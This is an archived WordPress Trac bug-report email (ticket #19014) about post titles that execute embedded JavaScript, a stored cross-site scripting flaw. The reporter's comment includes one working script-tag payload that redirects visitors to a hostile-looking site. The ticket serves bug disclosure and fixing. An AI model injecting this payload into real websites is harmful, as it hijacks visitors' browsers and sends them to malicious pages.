[wp-trac] [WordPress Trac] #19014: Titles containing JavaScript execute the JavaScript - XSS risk

WordPress Trac wp-trac at lists.automattic.com
Thu Oct 20 14:27:17 UTC 2011


#19014: Titles containing JavaScript execute the JavaScript - XSS risk
--------------------------+------------------------------
 Reporter:  dbvista       |       Owner:
     Type:  defect (bug)  |      Status:  new
 Priority:  normal        |   Milestone:  Awaiting Review
Component:  General       |     Version:  3.2.1
 Severity:  major         |  Resolution:
 Keywords:                |
--------------------------+------------------------------

Comment (by dbvista):

 Here's another great title:

 <script language="javascript">document.location='http://www.you-are-
 hacked.com';</script>

 which directs the browser to a malicious site.

-- 
Ticket URL: <http://core.trac.wordpress.org/ticket/19014#comment:1>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software


More information about the wp-trac mailing list